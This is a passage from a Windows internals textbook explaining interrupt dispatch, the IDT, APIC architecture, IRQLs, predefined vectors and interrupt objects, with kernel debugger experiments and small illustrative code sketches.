when they need service. Interrupt-driven devices allow the operating system to get the maximum
use out of the processor by overlapping central processing with I/O operations. A thread starts an I/O
transfer to or from a device and then can execute other useful work while the device completes the transfer. When the device is finished, it interrupts the processor for service. Pointing devices, printers, keyboards, disk drives, and network cards are generally interrupt driven.
System software can also generate interrupts. For example, the kernel can issue a software interrupt to initiate thread dispatching and to break into the execution of a thread asynchronously. The kernel can also disable interrupts so that the processor isn't interrupted, but it does so only infrequently, at critical moments (while processing an interrupt or dispatching an exception, for example).
The kernel installs interrupt trap handlers to respond to device interrupts. Interrupt trap handlers
transfer control either to an external routine (the ISR) that handles the interrupt or to an internal kernel
routine that responds to the interrupt. Device drivers supply ISRs to service device interrupts, and the
kernel provides interrupt-handling routines for other types of interrupts.
The following sections describe how hardware notifies the processor of device interrupts, the types of interrupts the kernel supports, how device drivers interact with the kernel (as a part
of interrupt processing), and the software interrupts the kernel recognizes (plus the kernel objects that
are used to implement them).
Hardware interrupt processing
On the hardware platforms supported by Windows, external I/O interrupts come into one of the inputs
on an interrupt controller, for example an I/O Advanced Programmable Interrupt Controller (IOAPIC). The controller, in turn, routes the interrupts to the processors' Local Advanced Programmable Interrupt Controllers (LAPIC), which ultimately interrupt the processor on a single input line.
Once the processor is interrupted, it queries the controller to get the global system interrupt vector
(GSIV), which is sometimes represented as an interrupt request (IRQ) number. The interrupt controller
translates the GSIV to a processor interrupt vector, which is then used as an index into a data structure called the interrupt dispatch table (IDT). The processor locates the IDT through its IDT Register (IDTR) and fetches the matching IDT entry for the interrupt vector.
Based on the information in the IDT entry, the processor can transfer control to an appropriate inter-
rupt dispatch routine running in Ring 0 (following the process described at the start of this section), or
it can even load a new TSS and update the Task Register (TR), using a process called an interrupt gate.
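The dispatch path can be condensed into a toy lookup. The handler names are taken from the !idt output shown later in this section; the GSIV-to-vector mapping itself is illustrative:

```python
# A tiny model of interrupt dispatch: GSIV -> processor vector -> IDT entry.
IDT = {
    0x0E: "KiPageFault",
    0x2F: "KiDpcInterrupt",
    0x31: "KiVmbusInterrupt0",
}

def dispatch(gsiv_to_vector, gsiv):
    """Translate a global system interrupt vector (GSIV) to a processor
    interrupt vector, then fetch the matching handler from the IDT."""
    vector = gsiv_to_vector[gsiv]
    return IDT[vector]
```

The real translation is performed by the interrupt controller, and the IDT entry additionally carries the code segment, stack, and gate-type information the processor uses for the transition.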
At system boot time, the kernel fills in the IDT with pointers to dedicated kernel and HAL routines for each exception and internally handled interrupt, as well as with pointers to thunk kernel routines that handle the external interrupts that device drivers can register for. On x86 and x64 architectures, interrupt vectors 0–31 are marked as reserved for processor traps, which are described in Table 8-3.
TABLE 8-3 Processor traps

Vector (Mnemonic)   Meaning
0 (#DE)             Divide error
1 (#DB)             Debug trap
2 (NMI)             Nonmaskable interrupt
3 (#BP)             Breakpoint trap
4 (#OF)             Overflow trap
5 (#BR)             Bound fault
6 (#UD)             Undefined opcode fault
7 (#NM)             FPU not available fault
8 (#DF)             Double fault
9 (#MF)             Coprocessor fault (no longer used)
10 (#TS)            TSS fault
11 (#NP)            Segment fault
12 (#SS)            Stack fault
13 (#GP)            General protection fault
14 (#PF)            Page fault
15                  Reserved
16 (#MF)            Floating-point fault
17 (#AC)            Alignment check fault
18 (#MC)            Machine check abort
19 (#XM)            SIMD fault
20 (#VE)            Virtualization exception
21 (#CP)            Control protection exception
22-31               Reserved
The remainder of the IDT entries are based on a combination of hardcoded values (for example, vectors 30 to 34 are always used for Hyper-V-related VMBus interrupts) as well as values negotiated between the device drivers, hardware, interrupt controllers, and the firmware. For example, a keyboard controller might send interrupt vector 82 on one particular Windows system and 67 on a different one.
EXPERIMENT: Viewing the 64-bit IDT
You can view the contents of the IDT, including information on what trap handlers Windows has
assigned to interrupts (including exceptions and IRQs), using the !idt kernel debugger command.
The !idt command with no flags shows the simplified view of all registered interrupts (and, on 64-bit machines, the processor trap handlers).
The following example shows what the output of the !idt command looks like on an x64 system:
0: kd> !idt
Dumping IDT: fffff8027074c000
00: fffff8026e1bc700 nt!KiDivideErrorFault
01: fffff8026e1bca00 nt!KiDebugTrapOrFault Stack = 0xFFFFF8027076E000
02: fffff8026e1bcec0 nt!KiNmiInterrupt
Stack = 0xFFFFF8027076A000
03: fffff8026e1bd380 nt!KiBreakpointTrap
04: fffff8026e1bd680 nt!KiOverflowTrap
05: fffff8026e1bd980 nt!KiBoundFault
06: fffff8026e1bde80 nt!KiInvalidOpcodeFault
07: fffff8026e1be340 nt!KiNpxNotAvailableFault
08: fffff8026e1be600 nt!KiDoubleFaultAbort Stack = 0xFFFFF80270768000
09: fffff8026e1be8c0 nt!KiNpxSegmentOverrunAbort
0a: fffff8026e1beb80 nt!KiInvalidTssFault
0b: fffff8026e1bee40 nt!KiSegmentNotPresentFault
0c: fffff8026e1bf1c0 nt!KiStackFault
0d: fffff8026e1bf500 nt!KiGeneralProtectionFault
0e: fffff8026e1bf840 nt!KiPageFault
10: fffff8026e1bfe80 nt!KiFloatingErrorFault
11: fffff8026e1c0200 nt!KiAlignmentFault
12: fffff8026e1c0500 nt!KiMcheckAbort
Stack = 0xFFFFF8027076C000
13: fffff8026e1c0fc0 nt!KiXmmException
14: fffff8026e1c1380 nt!KiVirtualizationException
15: fffff8026e1c1840 nt!KiControlProtectionFault
1f: fffff8026e1b5f50 nt!KiApcInterrupt
20: fffff8026e1b7b00 nt!KiSwInterrupt
29: fffff8026e1c1d00 nt!KiRaiseSecurityCheckFailure
2c: fffff8026e1c2040 nt!KiRaiseAssertion
2d: fffff8026e1c2380 nt!KiDebugServiceTrap
2f: fffff8026e1b80a0 nt!KiDpcInterrupt
30: fffff8026e1b64d0 nt!KiHvInterrupt
31: fffff8026e1b67b0 nt!KiVmbusInterrupt0
32: fffff8026e1b6a90 nt!KiVmbusInterrupt1
33: fffff8026e1b6d70 nt!KiVmbusInterrupt2
34: fffff8026e1b7050 nt!KiVmbusInterrupt3
35: fffff8026e1b48b8 hal!HalpInterruptCmciService (KINTERRUPT fffff8026ea59fe0)
b0: fffff8026e1b4c90 ACPI!ACPIInterruptServiceRoutine (KINTERRUPT ffffb88062898dc0)
ce: fffff8026e1b4d80 hal!HalpIommuInterruptRoutine (KINTERRUPT fffff8026ea5a9e0)
d1: fffff8026e1b4d98 hal!HalpTimerClockInterrupt (KINTERRUPT fffff8026ea5a7e0)
d2: fffff8026e1b4da0 hal!HalpTimerClockIpiRoutine (KINTERRUPT fffff8026ea5a6e0)
d7: fffff8026e1b4dc8 hal!HalpInterruptRebootService (KINTERRUPT fffff8026ea5a4e0)
d8: fffff8026e1b4dd0 hal!HalpInterruptStubService (KINTERRUPT fffff8026ea5a2e0)
df: fffff8026e1b4e08 hal!HalpInterruptSpuriousService (KINTERRUPT fffff8026ea5a1e0)
e1: fffff8026e1b8570 nt!KiIpiInterrupt
e2: fffff8026e1b4e20 hal!HalpInterruptLocalErrorService (KINTERRUPT fffff8026ea5a3e0)
e3: fffff8026e1b4e28 hal!HalpInterruptDeferredRecoveryService
(KINTERRUPT fffff8026ea5a0e0)
fd: fffff8026e1b4ef8 hal!HalpTimerProfileInterrupt (KINTERRUPT fffff8026ea5a8e0)
fe: fffff8026e1b4f00 hal!HalpPerfInterrupt (KINTERRUPT fffff8026ea5a5e0)
On the system used to provide the output for this experiment, the ACPI SCI ISR is at interrupt number B0h. You can also see that interrupt 14 (0Eh) corresponds to KiPageFault, which is a type of predefined processor trap, as discussed earlier. Note that some entries have a dedicated Stack pointer next to them. These correspond to the traps explained in the section on "Task state segments" from earlier, which require dedicated safe kernel stacks for processing. The debugger knows these stack pointers by dumping the IDT entry, which you can do as well by using the dx command and dereferencing one of the interrupt vectors in the IDT. Although you can obtain the IDT address from the processor's IDTR register, it is also available in the processor control region (PCR) in a field called IdtBase.
0: kd> dx @$pcr->IdtBase[2].IstIndex
@$pcr->IdtBase[2].IstIndex : 0x3 [Type: unsigned short]
0: kd> dx @$pcr->IdtBase[0x12].IstIndex
@$pcr->IdtBase[0x12].IstIndex : 0x2 [Type: unsigned short]
If you compare the IST index values seen here with the previous experiment on dumping the TSS, you'll find they match the dedicated kernel stacks shown earlier.
Each processor has a separate IDT (pointed to by its own IDTR) so that different processors can run different ISRs, if appropriate. For example, on a multiprocessor system, each processor receives the clock interrupt, but only one processor updates the system clock in response to this interrupt. All the processors, however, use the interrupt to measure thread quantum and to initiate rescheduling when a thread's quantum ends. Similarly, some system configurations might require that a particular processor handle certain device interrupts.
Programmable interrupt controller architecture
Traditional x86 systems relied on the i8259A Programmable Interrupt Controller (PIC), a standard that originated with the original IBM PC. The i8259A PIC worked only with uniprocessor systems and had only eight interrupt lines; the IBM PC AT design later cascaded a secondary PIC into one of the primary PIC's lines, extending the total to 15 interrupt lines. Because PICs had such a quirky way of handling more than 8 devices, and because even 15 became a bottleneck, as well as due to various electrical issues (they were prone to spurious interrupts) and the limitations of uniprocessor support, modern systems eventually phased out this type of interrupt controller, replacing it with a variant called the i82489 Advanced Programmable Interrupt Controller (APIC).
Because APICs were designed for multiprocessor systems, the Multiprocessor Specification (MPS) design was built around the i82489 APIC and the integration of both an I/O APIC (IOAPIC) connected to external hardware devices and a Local APIC (LAPIC) connected to the processor core. With time, the MPS standard was folded into the Advanced Configuration and Power Interface (ACPI). To provide compatibility with uniprocessor operating systems and boot code that starts a multiprocessor system in uniprocessor mode, APICs support a PIC compatibility mode with 15 interrupts and delivery of interrupts to only the primary processor.
As mentioned, the APIC consists of several components: an I/O APIC that receives interrupts from devices, local APICs that receive interrupts from the I/O APIC on the bus and that interrupt the CPU they are associated with, and an i8259A-compatible interrupt controller that translates APIC input into PIC-equivalent signals. Because there can be multiple I/O APICs on the system, motherboards typically have a piece of core logic that sits between them and the processors. This logic is responsible for implementing interrupt routing algorithms that both balance the device interrupt load across processors and attempt to take advantage of locality, delivering device interrupts to the same processor that has just been handling interrupts of the same type. Windows can also program the I/O APIC with its own routing logic to support various features such as interrupt steering, but device drivers generally have no say in these routing decisions.
Because the x64 architecture is compatible with x86 operating systems, x64 systems must provide the same interrupt controllers as x86 systems. A significant difference, however, is that the x64 versions of Windows refused to run on systems that did not have an APIC because they use the APIC for interrupt control, whereas x86 versions of Windows supported both PIC and APIC hardware. This changed with Windows 8 and later versions, which only run on APIC hardware regardless of CPU architecture.
Each LAPIC also contains a Task Priority Register (TPR); Windows uses this register to store the current software interrupt priority level (in the case of Windows, called the IRQL) and to inform the IOAPIC when it makes routing decisions. More information on IRQL handling will follow shortly.
FIGURE 8-12 APIC architecture. (The figure shows device interrupts entering both an i8259A-equivalent PIC and the I/O APIC, which routes them to the Local APIC on each CPU's processor core.)
EXPERIMENT: Viewing the PIC and APIC
You can view the configuration of the PIC on a uniprocessor and the local APIC on a multiprocessor by using the !pic and !apic kernel debugger commands. Here is the output of the !pic command on a uniprocessor. Note that even on a system with an APIC, this command still works because APIC systems always have an associated PIC-equivalent for emulating legacy hardware.
lkd> !pic
----- IRQ Number ----- 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
Physically in service: Y . . . . . . . . Y Y Y . . . .
Physically masked:
Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y
Physically requested: Y . . . . . . . . Y Y Y . . . .
Level Triggered:
. . . . . . . . . . . . . . . .
The following output is for the !apic command on a system running with Hyper-V enabled, which you can see due to the presence of the SINTI entries, corresponding to the Synthetic Interrupt Controller (SynIC), described in Chapter 9. Note that during local kernel debugging, this command shows the APIC associated with the current processor—in other words, whichever processor the debugger's thread happens to be running on. When looking at a crash dump or remote system, you can use the ~ (tilde) command followed by the processor number to switch the processor of whose local APIC you want to see. In either case, the number next to the ID: label will tell you which processor you are looking at.
lkd> !apic
Apic (x2Apic mode) ID:1 (50014) LogDesc:00000002 TPR 00
TimeCnt: 00000000clk SpurVec:df FaultVec:e2 error:0
Ipi Cmd: 00000000`0004001f Vec:1F FixedDel Dest=Self
edg high
Timer..: 00000000`000300d8 Vec:D8 FixedDel Dest=Self
edg high
m
Linti0.: 00000000`000100d8 Vec:D8 FixedDel Dest=Self
edg high
m
Linti1.: 00000000`00000400 Vec:00 NMI Dest=Self
edg high
Sinti0.: 00000000`00020030 Vec:30 FixedDel Dest=Self
edg high
Sinti1.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti2.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti3.: 00000000`000000d1 Vec:D1 FixedDel Dest=Self
edg high
Sinti4.: 00000000`00020030 Vec:30 FixedDel Dest=Self
edg high
Sinti5.: 00000000`00020031 Vec:31 FixedDel Dest=Self
edg high
Sinti6.: 00000000`00020032 Vec:32 FixedDel Dest=Self
edg high
Sinti7.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti8.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti9.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintia.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintib.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintic.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintid.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintie.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintif.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
TMR: 95, A5, B0
IRR:
ISR:
The various numbers following the Vec labels indicate the associated vector in the IDT for each entry. For example, vector 0xE1 handles the interprocessor interrupt (IPI) vector, and vector 0xE2 handles APIC errors. Going back to the !idt output, you can see that vector 0x1F is the kernel's APC Interrupt (meaning that an IPI was recently used to send an APC from one processor to another).
The following output is for the !ioapic command, which displays the configuration of the I/O APIC. Notice how IRQ 9 (the System Control Interrupt, or SCI) is associated with vector B0h, which in the !idt output from the earlier experiment was associated with ACPI.SYS.
0: kd> !ioapic
Controller at 0xfffff7a8c0000898 I/O APIC at VA 0xfffff7a8c0012000
IoApic @ FEC00000 ID:8 (11) Arb:0
Inti00.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti01.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti02.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti03.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti04.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti05.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti06.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti07.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti08.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti09.: ff000000`000089b0 Vec:B0 LowestDl Lg:ff000000
lvl high
Inti0A.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti0B.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Software interrupt request levels (IRQLs)
Although interrupt controllers perform interrupt prioritization, Windows imposes its own interrupt priority scheme known as interrupt request levels (IRQLs). The kernel represents IRQLs internally as a number from 0 through 31 on x86 and from 0 to 15 on x64 (and ARM/ARM64), with higher numbers representing higher-priority interrupts, as illustrated in Figure 8-13.
Interrupts are serviced in priority order, and a higher-priority interrupt preempts the servicing of a lower-priority interrupt. When a high-priority interrupt occurs, the processor saves the interrupted thread's state and invokes the trap dispatcher associated with the interrupt, which raises the IRQL and calls the interrupt's service routine. After the service routine executes, the interrupt dispatcher lowers the processor's IRQL to where it was before the interrupt occurred and then loads the saved machine state. The interrupted thread resumes executing where it left off. When the kernel lowers the IRQL, lower-priority interrupts that were masked might materialize. If this happens, the kernel repeats the process to handle the new interrupts.
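The core delivery rule can be captured in a one-line predicate. The following is a user-mode sketch, not kernel code; the x64 IRQL values are the ones shown in Figure 8-13.

```c
#include <stdbool.h>

/* x64 IRQL values as described in this section (0-15). */
enum {
    PASSIVE_LEVEL  = 0,   /* normal thread execution */
    APC_LEVEL      = 1,
    DISPATCH_LEVEL = 2,   /* DPC/dispatch */
    CLOCK_LEVEL    = 13,
    IPI_LEVEL      = 14,
    HIGH_LEVEL     = 15
};

/* An interrupt is serviced immediately only if its IRQL is above the
   processor's current IRQL; otherwise it is masked (held pending). */
static bool IsInterruptDelivered(int currentIrql, int sourceIrql)
{
    return sourceIrql > currentIrql;
}
```

For example, a clock interrupt preempts a processor running at DPC/dispatch level, but a DPC stays pending while the clock interrupt is being serviced.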
FIGURE 8-13 x86 and x64 interrupt request levels (IRQLs).

x86 IRQLs: 31 High; 30 Power fail; 29 Interprocessor interrupt; 28 Clock; 27 Profile/Synch; 26 down to 3, device interrupts (Device n down to Device 1), with the Corrected Machine Check Interrupt among the low device levels; 2 DPC/dispatch; 1 APC; 0 Passive/Low. Levels 3 and above are hardware interrupts, 2 and 1 are software interrupts, and 0 is normal thread execution.

x64 IRQLs: 15 High/Profile; 14 Interprocessor interrupt/Power; 13 Clock; 12 Synch; 11 down to 3, device interrupts (Device n down to Device 1); 2 Dispatch/DPC; 1 APC; 0 Passive/Low.
IRQL priority levels have a completely different meaning than thread-scheduling priorities (which
are described in Chapter 5 of Part 1). A scheduling priority is an attribute of a thread, whereas an IRQL
is an attribute of an interrupt source, such as a keyboard or a mouse. In addition, each processor has an
IRQL setting that changes as operating system code executes. As mentioned earlier, on x64 systems,
the IRQL is stored in the CR8 register that maps back to the TPR on the APIC.
Each processor's IRQL setting determines which interrupts that processor can receive. Kernel-mode code raises and lowers the IRQL on the processor on which it runs, either directly by calling KeRaiseIrql and KeLowerIrql or, more commonly, indirectly via calls to functions that acquire kernel synchronization objects. As Figure 8-14 illustrates, interrupts from a source with an IRQL above the current level interrupt the processor, whereas interrupts from sources with IRQLs equal to or below the current level are masked until an executing thread lowers the IRQL.
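The raise-then-restore pattern used with KeRaiseIrql and KeLowerIrql can be sketched in user-mode C as follows. This is a simplified single-processor model, not actual kernel code; the real implementation works on per-processor state (on x64, the CR8/TPR register).

```c
/* Simplified model of one processor's current IRQL. */
static int g_currentIrql = 0;   /* PASSIVE_LEVEL */

/* Model of KeRaiseIrql: raise to newIrql and return the old level so the
   caller can restore it later. */
static int RaiseIrql(int newIrql)
{
    int oldIrql = g_currentIrql;
    if (newIrql > g_currentIrql)    /* raising to a lower level is a bug */
        g_currentIrql = newIrql;
    return oldIrql;
}

/* Model of KeLowerIrql: restore the previously saved level. */
static void LowerIrql(int oldIrql)
{
    g_currentIrql = oldIrql;
}
```

The caller is responsible for saving the old IRQL and restoring it, which is why the masked-interrupt window lasts exactly as long as the raised region.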
FIGURE 8-14 Masking interrupts. (The figure shows the IRQL ladder from Passive/Low up to High/Profile alongside two processors at different IRQL settings—one at Clock, the other at DPC/dispatch—illustrating that each processor masks interrupts at and below its own current IRQL.)
When a device interrupt occurs, the trap handler raises the IRQL of the processor to the IRQL assigned to the interrupt source. This elevation masks all interrupts at and below that IRQL (on that processor only), which ensures that the processor servicing the interrupt isn't waylaid by interrupts at the same or a lower level. The masked interrupts are either handled by another processor or held back until the IRQL drops. Therefore, all components of the system, including the kernel and device drivers, attempt to keep the IRQL at passive level (sometimes called low level). They do this because device drivers can respond to their hardware in a timely manner only if the IRQL is not kept elevated for long periods. Thus, when the system is not performing any interrupt work (or needs to synchronize with it) or handling a software interrupt such as a DPC or APC, the IRQL is always 0. This obviously includes any user-mode processing, because allowing user-mode code to run at an elevated IRQL would have serious effects on system operation. In fact, returning to a user-mode thread with the IRQL above 0 results in an immediate system crash (bugcheck) and is a serious driver bug.
Context switches—from one thread to another due to preemption—run at IRQL 2 (hence the name dispatch level), meaning that the processor behaves in a single-threaded, cooperative fashion at this level and above. It is, for example, illegal to wait on a dispatcher object (more on this in the "Synchronization" section that follows) at this IRQL, as a context switch to a different thread (or the idle thread) would never occur. Another restriction is that only nonpaged memory can be accessed at IRQL DPC/dispatch level or higher.
This rule exists because accessing memory that is not resident results in a page fault. When a page fault occurs, the memory manager initiates a disk I/O and then calls the scheduler to perform a context switch (perhaps to the idle thread if no user thread is waiting to run)—which, as just described, is illegal if the fault occurred at DPC/dispatch level or higher at the time of the disk read. A further problem results from the fact that I/O completion is reported at APC level, so even without the context switch, the paging I/O would never complete because the completion APC would not get a chance to run.
If either of these two restrictions is violated, the system crashes with an IRQL_NOT_LESS_OR_EQUAL
or a DRIVER_IRQL_NOT_LESS_OR_EQUAL crash code. (See Chapter 10, “Management, diagnostics, and
tracing," for a thorough discussion of system crashes.) Violating these restrictions is a common bug in device drivers; the Driver Verifier has an option that detects this type of bug.
Conversely, this also means that when working at IRQL 1 (also called APC level), preemption is still active and context switching can occur. This makes IRQL 1 essentially behave as a thread-local IRQL instead of a processor-local IRQL, since a wait operation or preemption at IRQL 1 causes the scheduler to save the current IRQL with the thread (in its KTHREAD structure, as seen earlier) and restore it when the thread is scheduled again. This means that a thread at passive level (IRQL 0) can still preempt a thread running at APC level (IRQL 1), because below IRQL 2, the scheduler decides which thread controls the processor.
EXPERIMENT: Viewing the IRQL
You can view a processor's saved IRQL with the !irql debugger command. The saved IRQL represents the IRQL at the time just before the break-in to the debugger, which raises the IRQL to a static, meaningless value:
kd> !irql
Debugger saved IRQL for processor 0x0 -- 0 (LOW_LEVEL)
Note that the IRQL is saved in two locations. The first is the processor control region (PCR), whereas its extension, the processor region control block (PRCB), contains the saved IRQL in the DebuggerSavedIRQL field. This saved copy exists because a remote kernel debugger will raise the IRQL to HIGH_LEVEL to stop any and all asynchronous processor operations while the user is debugging the machine, which would cause the output of !irql to be meaningless. This "saved" value is thus used to indicate the IRQL right before the debugger is attached.
Each interrupt level has a specific purpose. For example, the kernel issues an interprocessor interrupt (IPI) to request that another processor perform an action, such as dispatching a particular thread for execution or updating its translation look-aside buffer (TLB) cache. The system clock generates an interrupt at regular intervals, and the kernel responds by updating the clock and measuring thread execution time. The HAL provides interrupt levels for use by interrupt-driven devices, and the kernel uses software interrupts (described later in this chapter) to initiate thread scheduling and to asynchronously break into a thread's execution.
Mapping interrupt vectors to IRQLs
On systems without an APIC-based architecture, the mapping between the GSIV/IRQ and the IRQL had to be strict. To avoid situations where the interrupt controller might consider one interrupt line higher priority while Windows considers it lower, on APIC systems Windows takes advantage of the fact that the priority of an interrupt is not tied to its GSIV/IRQ, but rather to the interrupt vector: the upper 4 bits of the vector map back to the priority. Since the IDT can have up to 256 entries, this gives a space of 16 possible priorities (for example, vector 0x40 would be priority 4), which are the same 16 numbers that the TPR can hold, which map back to the same 16 IRQLs that Windows implements!
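The vector-to-priority relationship is simple arithmetic, and it can be sketched in one line. The vector values below come from the !idt output and Table 8-4 in this section.

```c
/* On APIC systems, the upper 4 bits of an interrupt vector encode its
   priority, which maps directly onto the 16 IRQLs Windows implements. */
static unsigned IrqlFromVector(unsigned vector)
{
    return vector >> 4;
}
```

For instance, the clock timer vector 0xD1 lands at priority 13, which is exactly the x64 clock IRQL, and the APC vector 0x1F lands at priority 1, the APC level.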
When a device's interrupt is configured, Windows must choose an appropriate interrupt vector for the interrupt, and program the IOAPIC to use that vector for the associated GSIV. Because the IRQL follows from the vector, Windows must first decide on the IRQL for the device and then choose an interrupt vector that maps back to that priority. These decisions are performed by the Plug and Play manager working in concert with a type of device driver called a bus driver, which determines the presence of devices on its bus (PCI, USB, and so on) and what interrupts can be assigned to a device.
The bus driver reports this information to the Plug and Play manager, which decides—after taking into account the acceptable interrupt assignments for all other devices—which interrupt will be assigned to each device. Then it calls a Plug and Play interrupt arbiter, which maps interrupts to IRQLs. This arbiter is exposed by the HAL, which also works with the ACPI bus driver and the PCI bus driver to collectively determine the appropriate mapping. In most cases, the ultimate vector number is selected in a round-robin fashion; an experiment later in this section shows how the debugger can query this information from the interrupt arbiter.
Outside of arbitered interrupt vectors associated with hardware interrupts, Windows also has a number of predefined interrupt vectors that are always at the same index in the IDT, listed in Table 8-4.
TABLE 8-4 Predefined interrupt vectors

Vector       Usage
0x1F         APC interrupt
0x2F         DPC interrupt
0x30         Hypervisor interrupt
0x31-0x34    VMBus interrupt(s)
0x35         CMCI interrupt
0xCD         Thermal interrupt
0xCE         IOMMU interrupt
0xCF         DMA interrupt
0xD1         Clock timer interrupt
0xD2         Clock IPI interrupt
0xD3         Clock always on interrupt
0xD7         Reboot interrupt
0xD8         Stub interrupt
0xD9         Test interrupt
0xDF         Spurious interrupt
0xE1         IPI interrupt
0xE2         LAPIC error interrupt
0xE3         DRS interrupt
0xF0         Watchdog interrupt
0xFB         Hypervisor HPET interrupt
0xFD         Profile interrupt
0xFE         Performance interrupt
Predefined IRQLs
■ The kernel typically uses high level only when it is halting the system in KeBugCheckEx and masking out all interrupts or when a remote kernel debugger is attached. The profile level shares the same value on non-x86 systems, where the profile timer runs at this level when profiling is enabled. The performance interrupt, associated with such features as Intel Processor Trace (Intel PT) and other hardware performance monitoring unit (PMU) capabilities, also runs at this level.
■ Interprocessor interrupt level is used to request another processor to perform an action, such as dispatching a particular thread for execution or updating its translation look-aside buffer cache. The Deferred Recovery Service (DRS) level also shares the same value and is used on x64 systems by the Windows Hardware Error Architecture (WHEA) for performing recovery from certain Machine Check Errors (MCE).
■ Clock level is used for the system's clock, which the kernel uses to track the time of day as well as to measure and allot CPU time to threads.
■ The synchronization IRQL is internally used by the dispatcher and scheduler code to protect access to global thread scheduling and wait/synchronization code. It is typically defined as the highest level right after the device IRQLs.
■ The device IRQLs are used to prioritize device interrupts. (See the previous section for how hardware interrupt levels are mapped to IRQLs.)
■ The corrected machine check interrupt level is used to signal the operating system after a serious but corrected hardware condition or error was reported by the CPU or firmware through the Machine Check Error (MCE) interface.
■ DPC/dispatch-level and APC-level interrupts are software interrupts that the kernel and device drivers generate. (DPCs and APCs are explained in more detail later in this chapter.)
■ The lowest IRQL, passive level, is not really an interrupt level at all; it is the setting at which normal thread execution takes place and all interrupts can occur.
Interrupt objects
The kernel provides a portable mechanism—a kernel control object called an interrupt object, or
KINTERRUPT—that allows device drivers to register ISRs for their devices. An interrupt object contains
all the information the kernel needs to associate a device ISR with a particular hardware interrupt,
including the address of the ISR, the polarity and trigger mode of the interrupt, the IRQL at which the
device interrupts, sharing state, the GSIV and other interrupt controller data, as well as a host of perfor-
mance statistics.
These interrupt objects are allocated from a common pool of memory, and when a device driver registers an interrupt (with IoConnectInterrupt or IoConnectInterruptEx), one is initialized with all the necessary information. Based on the number of processors eligible to receive the interrupt (which is indicated by the device driver when specifying the interrupt affinity), an interrupt object is allocated for each one—in the typical case, this means for every processor on the machine. Next, once an interrupt vector has been selected, an entry in the interrupt object array (InterruptObject) of each eligible processor is updated to point to the interrupt object. If the interrupt is shared with another device, the kernel updates the DispatchAddress (a field of the KINTERRUPT data structure) to point to the function KiChainedDispatch and chains the interrupt objects together through their InterruptListEntry fields; if the interrupt is exclusive, then KiInterruptDispatch is used instead.
The interrupt object also stores the IRQL associated with the interrupt so that KiInterruptDispatch or KiChainedDispatch can raise the IRQL to the correct level before calling the ISR and then lower the IRQL after the ISR returns. This two-step process is required because there is no way to pass a pointer to the interrupt object (or any other argument for that matter) on the initial dispatch because the initial dispatch is done by hardware.
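The vector-indexed lookup and the chained dispatch for shared vectors can be modeled with a short user-mode sketch. This is a hypothetical simplification: the names mirror, but are not, the kernel's actual KINTERRUPT machinery.

```c
#include <stddef.h>

/* Simplified stand-in for a KINTERRUPT: an ISR, its context, and a link
   for chaining when a vector is shared by more than one device. */
typedef struct InterruptObject {
    int (*ServiceRoutine)(void *context);   /* returns 1 if it handled it */
    void *Context;
    struct InterruptObject *Next;
} InterruptObject;

/* Per-processor table indexed by interrupt vector (256 IDT entries). */
static InterruptObject *InterruptTable[256];

/* Model of connecting an interrupt: chain onto any existing object. */
static void ConnectInterrupt(unsigned vector, InterruptObject *obj)
{
    obj->Next = InterruptTable[vector & 0xFF];
    InterruptTable[vector & 0xFF] = obj;
}

/* Model of chained dispatch: call each ISR on the chain until one claims
   the interrupt; an empty chain models an unexpected interrupt. */
static int DispatchVector(unsigned vector)
{
    for (InterruptObject *i = InterruptTable[vector & 0xFF]; i != NULL; i = i->Next)
        if (i->ServiceRoutine(i->Context))
            return 1;    /* handled */
    return 0;            /* unexpected interrupt */
}

/* Two sample ISRs for demonstration. */
static int DeclineIsr(void *context) { (void)context; return 0; }
static int ClaimIsr(void *context)   { (void)context; return 1; }
```

A shared ISR must check whether its own device actually raised the interrupt (returning 0 otherwise), which is why chained dispatch walks the list until someone claims it.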
When an interrupt occurs, the IDT points to one of 256 copies of the KiIsrThunk function, each one
having a different line of assembly code that pushes the interrupt vector on the kernel stack (because
this is not provided by the processor) and then calls a shared KiIsrLinkage function, which does the
rest of the processing. Among other things, the function builds an appropriate trap frame as explained
previously and eventually calls the dispatch function stored in the interrupt object, locating the object
by reading the current processor's InterruptObject array and using
the interrupt vector on the stack as an index, dereferencing the matching pointer. On the other hand,
if no interrupt object is associated with this vector, then depending on the value of the registry value
BugCheckUnexpectedInterrupts, the system either crashes with KeBugCheckEx, or the inter-
rupt is silently ignored, and execution is restored back to the original control point.
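The lookup-and-fallback logic can be modeled like this (a toy Python sketch; the real KiIsrLinkage is kernel code, and the dictionary here stands in for the per-processor InterruptObject array):

```python
BUGCHECK_UNEXPECTED_INTERRUPTS = False  # models the registry value of that name

def isr_linkage(vector, interrupt_objects):
    """Toy KiIsrLinkage: the vector pushed on the kernel stack by the
    KiIsrThunk copy is used as an index into the per-processor array of
    interrupt-object pointers."""
    interrupt = interrupt_objects.get(vector)
    if interrupt is None:
        # No KINTERRUPT is registered for this vector.
        if BUGCHECK_UNEXPECTED_INTERRUPTS:
            raise SystemError("KeBugCheckEx: unexpected interrupt")
        return "ignored"  # execution resumes at the original control point
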